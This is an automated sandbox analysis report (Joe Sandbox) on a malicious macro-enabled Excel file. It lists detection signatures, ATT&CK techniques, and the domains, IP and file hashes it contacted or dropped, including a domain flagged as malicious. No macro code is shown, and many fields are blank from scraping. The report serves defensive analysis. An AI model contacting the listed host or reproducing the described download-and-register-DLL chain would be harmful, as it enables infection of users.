Play interactive tourEdit tour
Analysis Report sample20210111-01.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load | Show sources |
Source: | Author: Florian Roth: |
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: Regsvr32 Anomaly | Show sources |
Source: | Author: Florian Roth: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | File created: | Jump to behavior |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | File created: | Jump to dropped file |
System Summary: |
---|
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro: | Name: pagesREviewsd | ||
Source: | OLE, VBA macro: | Name: pagesREviewsd |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: view_1_a_Layout |
Source: | OLE indicator, VBA macros: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting22 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
27% | Virustotal | Browse | ||
8% | Metadefender | Browse | ||
22% | ReversingLabs | Script-Macro.Trojan.Wacatac |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
6% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cdn.digicertcdn.com | 104.18.10.39 | true | false |
| unknown |
ppdb-legacy.man1lamongan.com | 199.59.242.150 | true | true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
199.59.242.150 | unknown | United States | 395082 | BODIS-NJUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 338158 |
Start date: | 11.01.2021 |
Start time: | 18:27:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | sample20210111-01.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal88.expl.evad.winXLSM@7/19@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
18:28:06 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
199.59.242.150 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cdn.digicertcdn.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
BODIS-NJUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 914 |
Entropy (8bit): | 7.367371959019618 |
Encrypted: | false |
SSDEEP: | 24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF |
MD5: | E4A68AC854AC5242460AFD72481B2A44 |
SHA1: | DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 |
SHA-256: | CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F |
SHA-512: | 5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.0862995200743666 |
Encrypted: | false |
SSDEEP: | 6:kKd/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:RLutWOxSW0zeYrsMlU/ |
MD5: | 0FCAC07AEFF591E1FF36221FC15993B5 |
SHA1: | 6AF4105DB3149F0580D3E8347CE34161EB9D1263 |
SHA-256: | 866EEAAF51EA184F5C6F6C26755C5F44D98B78AC37FE334267E6C41EEEBDFA1A |
SHA-512: | A4AB264BF66FC9F69430B213CBF09BDD919777E0DEC8820AA77F06AF8D3A60645C8B9C39355176C97B7B8FDCFCD40F6F28C27599B31B59533925FC1D8E1F2970 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.117051994467751 |
Encrypted: | false |
SSDEEP: | 6:kKvVwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:nVykPlE99SNxAhUegeT2 |
MD5: | 4FA401A194E5284B0318ED59396335C5 |
SHA1: | 82F0AEA431C0AC660303423D44DEC0F299C8D1E4 |
SHA-256: | 6942E5AA884492FA35293A7A7811E1228C463F90A67A883F83AB9FA64B2D07F8 |
SHA-512: | D536E1FEDB6B5392CAD3B8341B10A2B875D6945C499BA76F09486461FD7D6037BCF0CE2B74A392F92B6458AEA041914D4DA52C6DE0A07340C67EEA415EA4A97F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1408 |
Entropy (8bit): | 2.270567557934206 |
Encrypted: | false |
SSDEEP: | 12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB |
MD5: | 40550DC2F9D56285FA529159B8F2C6A5 |
SHA1: | DD81D41D283D2881BEC77E00D773C7E8C0744DA3 |
SHA-256: | DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1 |
SHA-512: | FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2653 |
Entropy (8bit): | 7.818766151665501 |
Encrypted: | false |
SSDEEP: | 48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x |
MD5: | 30D3FFA1E30B519FD9B1B839CC65C7BE |
SHA1: | 1EB0F0E160FF7440223A7FE46F08B503F03D3AFB |
SHA-256: | 89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC |
SHA-512: | 88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 16312 |
Entropy (8bit): | 3.7163402135276207 |
Encrypted: | false |
SSDEEP: | 96:4KbBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1A:4LBKzFCEuhTlyZVaPYVaJa5GG |
MD5: | 0FDF227B92A2ECDFE906E27D6C032F8A |
SHA1: | 0EB3004A2A4905A6DEAB1996B86B4328860EE777 |
SHA-256: | 11F89CB104E776E2E1077133CBBE0C568E3F4F870157534C1F489216E9328093 |
SHA-512: | B80868BD0B49AC51AFA4A3FA0BC4B0D23656AFADE3C46EB9C72224DD787F1CF7E1215563E021F59449CA97D46FF1540FC9A1F693D77783B303935DA3FCE0E061 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 56572 |
Entropy (8bit): | 7.850619347326348 |
Encrypted: | false |
SSDEEP: | 768:hnSWNrAli8zJjXl9e4JpKmyslLBti3rng54DpyNzSHOdFoKqbLNFq9z:hXUl/i434o9og540NzgO/ObLNFq9z |
MD5: | DEC0E4FC83D4C848B110DB20629C98DC |
SHA1: | 9A7EC2860D75C9984F6713A08DA3085EF6BC91AE |
SHA-256: | FB2A27AF526DF0402AA3712EC3F0E20C9704DAC783BC737C4FF46D3629D76812 |
SHA-512: | 1F430E39C5AF36D0CA40E33828EF4002D4BB6C39A891027F3F489E8ED64A72914F33EE09BD56746DA162F762121113C13CA5FE2C55F7A342DD8127ED4CB098A9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1392 |
Entropy (8bit): | 3.142934598289609 |
Encrypted: | false |
SSDEEP: | 24:pll/r8suFosnbeTl/3vXkJXHIUbcW1IP/dOZ5GjXO/CUnHBFzE:pll/QFZbkXWGlON/xBFY |
MD5: | 91CFCC4A1A09DB77E653BB2E13F9B179 |
SHA1: | 165023666DAE5D631E04A9220442E401075DB3D1 |
SHA-256: | BA228004FCDF193E308AB0545750EE259A1D20999071DF01CD8B4B3964256422 |
SHA-512: | 2FDE452FAFAB930FE87B4E633057B63D4F21FD34634D8153423467102CAB76A939694316098E5AAECFE05AAEC90632FDF5EF79E21647AF5C70162EC0693A9118 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206769656577553 |
Encrypted: | false |
SSDEEP: | 1536:cG4LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c5NNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | C5E9F5703FA359DD72FBB85355945491 |
SHA1: | 21549B782C4424D9100D4477D34847842528426E |
SHA-256: | 98870A08EBB24B9C458C0ECE3F7CDDF3089A26C83403BF653B00ABBF244FFA95 |
SHA-512: | 0AC6C3C8EF98C31CCA647277EAB1C28565ACA4F0BB02A7BFBC040594DC327D6D7BD37D601860D47823EDA5FCC11354C5C67A88EE1C2890625DA2F330DB9D7126 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\DWWIN.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 3110 |
Entropy (8bit): | 3.6796097788243274 |
Encrypted: | false |
SSDEEP: | 96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp38MkSMY3:Wl7LBNuhhgG45nv58MlMI |
MD5: | 9951D43E6E3E0625775F9777E865C7B5 |
SHA1: | 6D551E14B691ED0A9383729CDD21BE086CD055AA |
SHA-256: | 2E5E8A5064AA4428F1BD0F83AAB230604EBBC4FCAC184BDCDC22006D2E74B86D |
SHA-512: | 8CDF8C3FE9AA9116F6621F44429268639679D8A2A5784DC0EA7AE172235742C67671188DF6786256B773A65A36E738A15FD11B11BF3F4529CAD2ED8DFD38BB7D |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 51613 |
Entropy (8bit): | 7.823714360059984 |
Encrypted: | false |
SSDEEP: | 768:UAK3YYc0e76UlwEBwuOASEvIrC98rbqFqcO+hxOVPZKp42A205LEdT/C9WNJVTQY:d976UmE+uhBQrC98PGZHUnN5LaLTQDi9 |
MD5: | 138F4E0E9934BE4DA0426CB5321F0D7F |
SHA1: | 84070B3A221BFB5C0DE40209E639669583CEC8C3 |
SHA-256: | 1D254C6FD6801C024975A8EEF3575FE869C3AC88AF910C27E24DCA3957243217 |
SHA-512: | 5E69E147D8439A637A11C9B2481E0778E65DA67BF1E059FB038266990E3B0C608E2DC8BD3BFE4D187191F8D54C138663EF215073FF872A9A68255091DC7C35A9 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48075162575188 |
Encrypted: | false |
SSDEEP: | 12:85Q/k2kcLgXg/XAlCPCHaXtB8XzB/DhiUBEX+WnicvbsaRbDtZ3YilMMEpxRljKA:85dDK/XTd6jhhnEYehtDv3qNArNru/ |
MD5: | B339C286696BE14A0BFB8FB5E272DD38 |
SHA1: | F3CC42F0CD4D791395DF1E3D43223997C63E4D41 |
SHA-256: | A352E71022A6431154D763D66924E48A7411E8F285071E107CAA18D18EAACDFB |
SHA-512: | 85695DE99B0CC82045A566D3BE60B0DC43FE56ECE3B080992384C3DF51220EDEEDFFEA15E51ADEBA897996E1AE444C9A8E5FE34EA9512990A2D5B0594959B1D0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 106 |
Entropy (8bit): | 4.288085753919832 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC |
MD5: | 3A4CD3A9401D75DF179FD5850F863649 |
SHA1: | 1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB |
SHA-256: | 6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF |
SHA-512: | 31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2108 |
Entropy (8bit): | 4.5041154003832595 |
Encrypted: | false |
SSDEEP: | 48:8Vos/XT0jFxEllGxVl1NAQh2Vos/XT0jFxEllGxVl1NAQ/:8ys/XojFxjLNAQh2ys/XojFxjLNAQ/ |
